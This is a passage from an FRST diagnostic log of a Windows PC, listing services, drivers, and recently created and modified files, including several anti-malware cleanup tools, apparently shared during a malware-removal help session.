S4 FLEXnet Licensing Service; C:\Program Files (x86)\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [651720 2009-08-06] (Macrovision Europe Ltd.) [File not signed]
S2 gupdate1ca1c3cefd8b09c; C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [133104 2009-08-13] (Google Inc.)
S4 HP Health Check Service; c:\Program Files (x86)\Hewlett-Packard\HP Health Check\hphc_service.exe [94208 2008-12-04] (Hewlett-Packard) [File not signed]
S4 HPBtnSrv; C:\Program Files (x86)\Hewlett-Packard\HP Easy Backup\HPBtnSrv.exe [192512 2008-09-30] () [File not signed]
R2 hpqddsvc; C:\Program Files (x86)\HP\Digital Imaging\bin\hpqddsvc.dll [135168 2008-10-16] (Hewlett-Packard Co.) [File not signed]
R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [906752 2008-10-16] (Hewlett-Packard Co.) [File not signed]
S4 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
R2 IMFservice; C:\Program Files (x86)\IObit\IObit Malware Fighter\IMFsrv.exe [335168 2013-04-25] (IObit)
S4 LightScribeService; c:\Program Files (x86)\Common Files\LightScribe\LSSrvc.exe [73728 2009-03-17] (Hewlett-Packard Company) [File not signed]
S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.141\McCHSvc.exe [289256 2014-01-15] (McAfee, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2008-07-18] (Hewlett-Packard) [File not signed]
R2 NIS; C:\Program Files (x86)\Norton Internet Security\Engine\20.5.0.28\ccSvcHst.exe [144368 2013-05-20] (Symantec Corporation)
R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-08-14] ()
S4 sprtsvc_ncnetworksdm; C:\Program Files (x86)\NCNETWORKSDM\bin\sprtsvc.exe [206120 2010-06-17] (SupportSoft, Inc.)
S4 tgsrvc_ncnetworksdm; C:\Program Files (x86)\NCNETWORKSDM\bin\tgsrvc.exe [185640 2010-06-17] (SupportSoft, Inc.)
S2 RoxLiveShare9; No ImagePath
S2 vToolbarUpdater18.1.9; C:\Program Files (x86)\Common Files\AVG Secure Search\vToolbarUpdater\18.1.9\ToolbarUpdater.exe [X]

==================== Drivers (Whitelisted) ====================

(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

U5 AppMgmt; C:\Windows\system32\svchost.exe [27648 2008-01-20] (Microsoft Corporation)
S3 ASPI; C:\Windows\SysWOW64\DRIVERS\ASPI32.sys [84832 2002-07-17] (Adaptec) [File not signed]
R1 avgtp; C:\Windows\system32\drivers\avgtpx64.sys [50976 2014-08-11] (AVG Technologies)
S1 Beep; No ImagePath
R1 BHDrvx64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\BASHDefs\20140912.003\BHDrvx64.sys [1586904 2014-09-12] (Symantec Corporation)
R1 ccSet_NIS; C:\Windows\system32\drivers\NISx64\1405000.01C\ccSetx64.sys [169048 2013-04-15] (Symantec Corporation)
S3 cpuz132; No ImagePath
R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-09] (Symantec Corporation)
R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-09] (Symantec Corporation)
R3 FileMonitor; C:\Program Files (x86)\IObit\IObit Malware Fighter\Drivers\wlh_amd64\FileMonitor.sys [23048 2013-03-23] (IObit)
S3 hitmanpro36; C:\Windows\system32\drivers\hitmanpro36.sys [30496 2012-09-06] ()
R1 IDSVia64; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\IPSDefs\20140912.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation)
S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-09-14] (Malwarebytes Corporation)
R3 NAVENG; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\VirusDefs\20140913.021\ENG64.SYS [129752 2014-09-11] (Symantec Corporation)
R3 NAVEX15; C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NIS_20.2.0.19\Definitions\VirusDefs\20140913.021\EX64.SYS [2137304 2014-09-11] (Symantec Corporation)
R3 PdiPorts; C:\Windows\System32\DRIVERS\PdiPorts.sys [20592 2009-06-23] (Portrait Displays, Inc.)
R3 RegFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\wlh_amd64\regfilter.sys [34336 2013-03-26] (IObit.com)
S3 RimUsb; No ImagePath
S3 RimVSerPort; C:\Windows\System32\DRIVERS\RimSerial_AMD64.sys [31744 2009-01-09] (Research in Motion Ltd)
S1 SASDIFSV; No ImagePath
S3 SASENUM; No ImagePath
S1 SASKUTIL; No ImagePath
R1 SRTSP; C:\Windows\System32\Drivers\NISx64\1405000.01C\SRTSP64.SYS [796760 2013-05-15] (Symantec Corporation)
R1 SRTSPX; C:\Windows\system32\drivers\NISx64\1405000.01C\SRTSPX64.SYS [36952 2013-03-04] (Symantec Corporation)
R0 SymDS; C:\Windows\System32\drivers\NISx64\1405000.01C\SYMDS64.SYS [493656 2013-05-20] (Symantec Corporation)
R0 SymEFA; C:\Windows\System32\drivers\NISx64\1405000.01C\SYMEFA64.SYS [1139800 2013-05-22] (Symantec Corporation)
R3 SymEvent; C:\Windows\system32\Drivers\SYMEVENT64x86.SYS [177312 2013-06-12] (Symantec Corporation)
R1 SymIRON; C:\Windows\system32\drivers\NISx64\1405000.01C\Ironx64.SYS [224416 2013-03-04] (Symantec Corporation)
R1 SYMTDIv; C:\Windows\System32\Drivers\NISx64\1405000.01C\SYMTDIV.SYS [457304 2013-04-24] (Symantec Corporation)
R3 UrlFilter; C:\Program Files (x86)\IObit\IObit Malware Fighter\drivers\wlh_amd64\UrlFilter.sys [23016 2013-03-26] (IObit.com)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 IpInIp; system32\DRIVERS\ipinip.sys [X]
S3 NwlnkFlt; system32\DRIVERS\nwlnkflt.sys [X]
S3 NwlnkFwd; system32\DRIVERS\nwlnkfwd.sys [X]
S3 PCDSRVC{F36B3A4C-F95654BD-06000000}_0; \??\c:\program files\pc-doctor for windows\pcdsrvc_x64.pkms [X]

==================== NetSvcs (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)

==================== One Month Created Files and Folders ========

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-15 14:45 - 2014-09-15 14:45 - 02347384 _____ (ESET) C:\Users\Hogg\Desktop\esetsmartinstaller_enu.exe
2014-09-15 14:45 - 2014-09-15 14:45 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-09-15 12:37 - 2014-09-15 12:41 - 00000000 ____D () C:\AdwCleaner
2014-09-15 09:59 - 2014-09-15 09:59 - 00021363 _____ () C:\ComboFix.txt
2014-09-15 08:12 - 2014-09-15 09:59 - 00000000 ____D () C:\Qoobox
2014-09-15 08:12 - 2011-06-26 00:45 - 00256000 _____ () C:\Windows\PEV.exe
2014-09-15 08:12 - 2010-11-07 11:20 - 00208896 _____ () C:\Windows\MBR.exe
2014-09-15 08:12 - 2009-04-19 22:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2014-09-15 08:12 - 2000-08-30 18:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2014-09-15 08:12 - 2000-08-30 18:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2014-09-15 08:12 - 2000-08-30 18:00 - 00098816 _____ () C:\Windows\sed.exe
2014-09-15 08:12 - 2000-08-30 18:00 - 00080412 _____ () C:\Windows\grep.exe
2014-09-15 08:12 - 2000-08-30 18:00 - 00068096 _____ () C:\Windows\zip.exe
2014-09-15 08:10 - 2014-09-15 09:58 - 00000000 ____D () C:\Windows\erdnt
2014-09-15 08:09 - 2014-09-15 08:09 - 05578360 ____R (Swearware) C:\Users\Hogg\Desktop\ComboFix.exe
2014-09-15 08:09 - 2014-09-15 08:09 - 05578360 _____ (Swearware) C:\Users\Hogg\Downloads\ComboFix.exe
2014-09-14 09:18 - 2014-09-15 17:21 - 00000000 ____D () C:\FRST
2014-09-14 09:08 - 2014-09-14 09:08 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-09-14 08:49 - 2014-09-14 08:49 - 00262144 _____ () C:\Windows\Minidump\Mini091414-01.dmp
2014-09-14 08:48 - 2014-09-14 08:48 - 1521674558 _____ () C:\Windows\MEMORY.DMP
2014-09-14 08:45 - 2014-09-14 08:45 - 00000000 ____D () C:\a400f61a0bb2614026ab8a56ec
2014-09-14 08:36 - 2014-06-26 16:17 - 01389200 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe
2014-09-14 08:36 - 2014-06-26 16:17 - 00619664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardagt.exe
2014-09-14 08:36 - 2014-06-26 16:17 - 00171152 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll
2014-09-14 08:36 - 2014-06-26 16:17 - 00099480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\infocardapi.dll
2014-09-14 08:36 - 2014-06-26 16:17 - 00008856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardres.dll
2014-09-14 08:36 - 2014-06-26 16:17 - 00008848 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll
2014-09-14 08:35 - 2014-06-05 22:29 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe
2014-09-14 08:35 - 2014-06-05 22:28 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe
2014-09-14 08:10 - 2014-09-14 08:10 - 00000000 ____D () C:\ProgramData\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00001010 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Program Files (x86)\IObit
2014-09-14 08:02 - 2014-09-14 08:19 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-14 07:56 - 2014-09-14 07:57 - 00002478 _____ () C:\Users\Hogg\Desktop\FSS.txt
2014-09-13 11:01 - 2014-06-06 02:59 - 00506880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\qedit.dll
2014-09-13 11:01 - 2014-06-06 01:13 - 00620032 _____ (Microsoft Corporation) C:\Windows\system32\qedit.dll
2014-09-13 11:01 - 2014-03-10 00:26 - 01869824 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2014-09-13 11:01 - 2014-03-10 00:26 - 01794560 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2014-09-13 11:01 - 2014-03-09 19:22 - 01401344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2014-09-13 11:01 - 2014-03-09 19:22 - 01248768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2014-09-13 11:01 - 2013-10-29 22:34 - 00374784 _____ (Microsoft Corporation) C:\Windows\system32\SysFxUI.dll
2014-09-13 11:01 - 2013-10-29 21:55 - 00122368 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\drmk.sys
2014-09-13 11:01 - 2013-10-29 20:33 - 00218112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\portcls.sys
2014-09-13 11:01 - 2013-10-22 03:31 - 00079360 _____ (Microsoft Corporation) C:\Windows\system32\imagehlp.dll
2014-09-13 11:01 - 2013-10-22 01:19 - 00158208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\imagehlp.dll
2014-09-13 11:01 - 2013-10-10 22:27 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\wshom.ocx
2014-09-13 11:01 - 2013-10-10 22:26 - 00198656 _____ (Microsoft Corporation) C:\Windows\system32\scrrun.dll
2014-09-13 11:01 - 2013-10-10 20:19 - 00166912 _____ (Microsoft Corporation) C:\Windows\system32\wscript.exe
2014-09-13 11:01 - 2013-10-10 20:19 - 00147968 _____ (Microsoft Corporation) C:\Windows\system32\cscript.exe
2014-09-13 11:01 - 2013-10-10 20:08 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\scrrun.dll
2014-09-13 11:01 - 2013-10-10 20:08 - 00131072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wshom.ocx
2014-09-13 11:01 - 2013-10-10 20:08 - 00036864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wshcon.dll
2014-09-13 11:01 - 2013-10-10 18:35 - 00155648 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wscript.exe
2014-09-13 11:01 - 2013-10-10 18:35 - 00135168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cscript.exe
2014-09-13 11:01 - 2013-07-20 04:45 - 00124112 _____ (Microsoft Corporation) C:\Windows\system32\PresentationCFFRasterizerNative_v0300.dll
2014-09-13 11:01 - 2013-07-20 04:44 - 00102608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2014-09-13 11:01 - 2013-07-07 22:20 - 00172544 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2014-09-13 11:01 - 2013-07-07 22:16 - 00992768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2014-09-13 11:01 - 2013-07-07 22:16 - 00133120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2014-09-13 11:01 - 2013-07-07 22:16 - 00098304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2014-09-13 11:01 - 2013-07-07 22:15 - 00218624 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2014-09-13 11:01 - 2013-07-07 22:12 - 01276416 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2014-09-13 11:01 - 2013-07-07 22:12 - 00174592 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2014-09-13 11:01 - 2013-07-07 22:12 - 00132096 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2014-09-13 11:01 - 2013-07-03 22:21 - 00532480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comctl32.dll
2014-09-13 11:01 - 2013-07-03 22:13 - 00633856 _____ (Microsoft Corporation) C:\Windows\system32\comctl32.dll
2014-09-13 11:01 - 2013-06-28 20:25 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbhub.sys
2014-09-13 11:01 - 2013-06-28 20:25 - 00259584 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbport.sys
2014-09-13 11:01 - 2013-06-28 20:25 - 00095744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbccgp.sys
2014-09-13 11:01 - 2013-06-28 20:25 - 00007552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbd.sys
2014-09-13 11:01 - 2013-06-26 17:00 - 00785624 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\Wdf01000.sys
2014-09-13 11:01 - 2013-06-26 17:00 - 00054376 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\WdfLdr.sys
2014-09-13 11:01 - 2013-06-26 17:00 - 00009728 _____ (Microsoft Corporation) C:\Windows\system32\Wdfres.dll
2014-09-13 11:01 - 2013-03-07 22:18 - 00451072 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2014-09-13 11:01 - 2013-03-07 22:17 - 02425344 _____ (Microsoft Corporation) C:\Windows\system32\mstscax.dll
2014-09-13 11:01 - 2013-03-07 21:52 - 02067968 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mstscax.dll
2014-09-13 11:01 - 2012-11-21 22:22 - 00456192 _____ (Microsoft Corporation) C:\Windows\system32\shlwapi.dll
2014-09-13 11:01 - 2012-11-21 21:54 - 00353280 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shlwapi.dll
2014-09-13 11:01 - 2012-11-07 22:26 - 01570816 _____ (Microsoft Corporation) C:\Windows\system32\quartz.dll
2014-09-13 11:01 - 2012-11-07 21:48 - 01314816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\quartz.dll
2014-09-13 11:01 - 2011-05-05 08:17 - 00049664 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbehci.sys
2014-09-13 11:01 - 2011-05-05 08:17 - 00029184 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbuhci.sys
2014-09-13 11:00 - 2014-06-02 15:30 - 03137536 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2014-09-13 11:00 - 2014-06-02 15:30 - 00503296 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll
2014-09-13 11:00 - 2014-06-02 15:29 - 02280448 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll
2014-09-13 11:00 - 2014-06-02 15:29 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\appinfo.dll
2014-09-13 11:00 - 2014-06-02 14:29 - 00087552 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe
2014-09-13 11:00 - 2014-06-02 04:31 - 02263552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2014-09-13 11:00 - 2014-06-02 04:31 - 00332800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll
2014-09-13 11:00 - 2014-06-02 04:30 - 01993728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll
2014-09-13 11:00 - 2014-05-30 01:10 - 00404992 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\afd.sys
2014-09-13 11:00 - 2013-05-01 22:16 - 00686080 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2014-09-13 11:00 - 2013-05-01 22:04 - 00443904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\win32spl.dll
2014-09-13 11:00 - 2013-05-01 22:03 - 00037376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\printcom.dll
2014-09-13 11:00 - 2012-11-02 04:45 - 00477696 _____ (Microsoft Corporation) C:\Windows\system32\dpnet.dll
2014-09-13 11:00 - 2012-11-02 04:45 - 00068096 _____ (Microsoft Corporation) C:\Windows\system32\dpnathlp.dll
2014-09-13 11:00 - 2012-11-02 04:18 - 00376320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnet.dll
2014-09-13 11:00 - 2012-11-02 02:59 - 00026112 _____ (Microsoft Corporation) C:\Windows\system32\dpnsvr.exe
2014-09-13 11:00 - 2012-11-02 02:26 - 00023040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dpnsvr.exe
2014-09-13 10:33 - 2014-09-15 13:07 - 01519284 _____ () C:\Windows\WindowsUpdate.log
2014-09-13 09:00 - 2014-09-13 09:16 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-09-13 08:43 - 2014-09-15 12:44 - 00000492 _____ () C:\Windows\Tasks\ParetoLogic Update Version3 Startup Task.job
2014-09-13 08:43 - 2014-09-13 08:43 - 00002916 _____ () C:\Windows\System32\Tasks\ParetoLogic Update Version3 Startup Task
2014-09-13 08:02 - 2014-09-13 08:02 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-13 08:00 - 2014-09-14 14:36 - 00003358 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-13 08:00 - 2014-09-14 14:36 - 00003222 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-12 19:57 - 2014-09-15 12:43 - 00555242 _____ () C:\Windows\PFRO.log
2014-09-11 19:45 - 2014-09-14 08:01 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-11 19:45 - 2014-09-13 10:33 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-09-11 19:45 - 2014-09-11 19:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-11 19:45 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-09-11 19:45 - 2014-05-12 07:26 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-09-10 09:12 - 2014-09-10 09:12 - 00001696 _____ () C:\Users\Public\Desktop\iTunes.lnk
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\ProgramData\34BE82C4-E596-4e99-A191-52C6199EBF69
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iTunes
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files\iPod
2014-09-10 09:12 - 2014-09-10 09:12 - 00000000 ____D () C:\Program Files (x86)\iTunes
2014-09-10 09:07 - 2014-09-10 09:08 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{13306464-7F21-4CB3-8898-656F1737CBDE}
2014-09-10 09:07 - 2014-09-10 09:07 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{A3C935CF-1510-4F00-9E9C-EF2EEF690822}
2014-09-07 18:53 - 2014-09-07 18:53 - 00131091 _____ () C:\Users\Hogg\Documents\French Powerpoint.pptx
2014-09-01 09:03 - 2014-09-01 09:03 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{1FCB82CA-3656-4F6D-9E00-833069C741DC}
2014-09-01 09:02 - 2014-09-01 09:02 - 00000000 ____D () C:\Users\Hogg\AppData\Local\{5A7A28E0-64E5-4538-BCD1-3606DF5D5886}
2014-08-29 10:04 - 2014-08-29 10:05 - 00000000 ___HD () C:\ProgramData\{698E0848-6D29-4305-80DC-E8D609260CE2}
2014-08-16 10:09 - 2014-09-08 20:24 - 00000000 ____D () C:\Users\Hogg\AppData\Local\Adobe

==================== One Month Modified Files and Folders =======

(If an entry is included in the fixlist, the file\folder will be moved.)

2014-09-15 17:21 - 2014-09-14 09:18 - 00000000 ____D () C:\FRST
2014-09-15 16:46 - 2009-08-13 11:50 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-09-15 16:43 - 2006-11-02 09:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-1.C7483456-A289-439d-8115-601632D005A0
2014-09-15 16:43 - 2006-11-02 09:22 - 00003616 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-2P-0.C7483456-A289-439d-8115-601632D005A0
2014-09-15 16:40 - 2012-05-23 20:30 - 00000924 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000UA.job
2014-09-15 16:40 - 2012-05-23 20:30 - 00000902 _____ () C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-764796802-3477399101-373240229-1000Core.job
2014-09-15 16:30 - 2012-12-14 10:04 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-09-15 14:45 - 2014-09-15 14:45 - 02347384 _____ (ESET) C:\Users\Hogg\Desktop\esetsmartinstaller_enu.exe
2014-09-15 14:45 - 2014-09-15 14:45 - 00000000 ____D () C:\Program Files (x86)\ESET
2014-09-15 13:07 - 2014-09-13 10:33 - 01519284 _____ () C:\Windows\WindowsUpdate.log
2014-09-15 12:48 - 2009-08-13 11:38 - 00003986 _____ () C:\Windows\System32\Tasks\Google Software Updater
2014-09-15 12:48 - 2009-08-13 11:38 - 00000880 _____ () C:\Windows\Tasks\Google Software Updater.job
2014-09-15 12:44 - 2014-09-13 08:43 - 00000492 _____ () C:\Windows\Tasks\ParetoLogic Update Version3 Startup Task.job
2014-09-15 12:44 - 2009-08-13 11:50 - 00000894 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-09-15 12:43 - 2014-09-12 19:57 - 00555242 _____ () C:\Windows\PFRO.log
2014-09-15 12:43 - 2013-06-28 12:48 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\CheckPoint
2014-09-15 12:43 - 2006-11-02 09:42 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-09-15 12:41 - 2014-09-15 12:37 - 00000000 ____D () C:\AdwCleaner
2014-09-15 12:41 - 2006-11-02 09:42 - 00032598 _____ () C:\Windows\Tasks\SCHEDLGU.TXT
2014-09-15 10:29 - 2012-05-24 19:58 - 00000404 ____H () C:\Windows\Tasks\Norton Security Scan for Hogg.job
2014-09-15 09:59 - 2014-09-15 09:59 - 00021363 _____ () C:\ComboFix.txt
2014-09-15 09:59 - 2014-09-15 08:12 - 00000000 ____D () C:\Qoobox
2014-09-15 09:59 - 2006-11-02 07:33 - 00000000 __RHD () C:\Users\Default
2014-09-15 09:58 - 2014-09-15 08:10 - 00000000 ____D () C:\Windows\erdnt
2014-09-15 09:58 - 2006-11-02 06:34 - 00000215 _____ () C:\Windows\system.ini
2014-09-15 09:00 - 2013-03-16 09:14 - 00000000 ____D () C:\Users\Hogg\AppData\Local\CrashDumps
2014-09-15 08:09 - 2014-09-15 08:09 - 05578360 ____R (Swearware) C:\Users\Hogg\Desktop\ComboFix.exe
2014-09-15 08:09 - 2014-09-15 08:09 - 05578360 _____ (Swearware) C:\Users\Hogg\Downloads\ComboFix.exe
2014-09-15 07:52 - 2006-11-02 06:46 - 00770214 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-14 20:14 - 2009-08-07 09:49 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-09-14 18:00 - 2013-06-30 07:53 - 00000494 _____ () C:\Windows\Tasks\Foresight Software Registration3.job
2014-09-14 14:36 - 2014-09-13 08:00 - 00003358 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-14 14:36 - 2014-09-13 08:00 - 00003222 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-764796802-3477399101-373240229-1000
2014-09-14 09:36 - 2006-11-02 07:33 - 00000000 ____D () C:\Windows\rescache
2014-09-14 09:12 - 2013-10-04 09:35 - 00759982 _____ () C:\Windows\SysWOW64\PerfStringBackup.INI
2014-09-14 09:08 - 2014-09-14 09:08 - 00000000 ____D () C:\ProgramData\WindowsSearch
2014-09-14 08:49 - 2014-09-14 08:49 - 00262144 _____ () C:\Windows\Minidump\Mini091414-01.dmp
2014-09-14 08:49 - 2009-08-17 20:32 - 00000000 ____D () C:\Windows\Minidump
2014-09-14 08:49 - 2009-08-06 10:03 - 00000000 ____D () C:\Windows\SysWOW64\RTCOM
2014-09-14 08:48 - 2014-09-14 08:48 - 1521674558 _____ () C:\Windows\MEMORY.DMP
2014-09-14 08:48 - 2014-04-14 13:35 - 00000000 ____D () C:\Program Files (x86)\Microsoft Silverlight
2014-09-14 08:45 - 2014-09-14 08:45 - 00000000 ____D () C:\a400f61a0bb2614026ab8a56ec
2014-09-14 08:21 - 2014-04-14 13:35 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-09-14 08:19 - 2014-09-14 08:02 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-14 08:10 - 2014-09-14 08:10 - 00000000 ____D () C:\ProgramData\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00001010 _____ () C:\Users\Public\Desktop\IObit Malware Fighter.lnk
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Users\Hogg\AppData\Roaming\IObit
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IObit Malware Fighter
2014-09-14 08:09 - 2014-09-14 08:09 - 00000000 ____D () C:\Program Files (x86)\IObit
2014-09-14 08:01 - 2014-09-11 19:45 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-14 07:57 - 2014-09-14 07:56 - 00002478 _____ () C:\Users\Hogg\Desktop\FSS.txt
2014-09-14 07:46 - 2006-11-02 06:34 - 00000285 _____ () C:\Windows\win.ini
2014-09-13 10:33 - 2014-09-11 19:45 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-09-13 09:23 - 2011-04-13 05:34 - 00000000 ____D () C:\Users\Hogg\Desktop\Aviation
2014-09-13 09:22 - 2009-10-18 20:33 - 00000000 ____D () C:\Users\Hogg\Desktop\Fitness
2014-09-13 09:16 - 2014-09-13 09:00 - 00000000 ____D () C:\TDSSKiller_Quarantine
2014-09-13 09:01 - 2014-03-05 19:29 - 00000000 ____D () C:\Program Files (x86)\QuickTime
2014-09-13 09:01 - 2013-11-22 09:58 - 00000000 ____D () C:\Program Files (x86)\PasswordBox
2014-09-13 08:43 - 2014-09-13 08:43 - 00002916 _____ () C:\Windows\System32\Tasks\ParetoLogic Update Version3 Startup Task
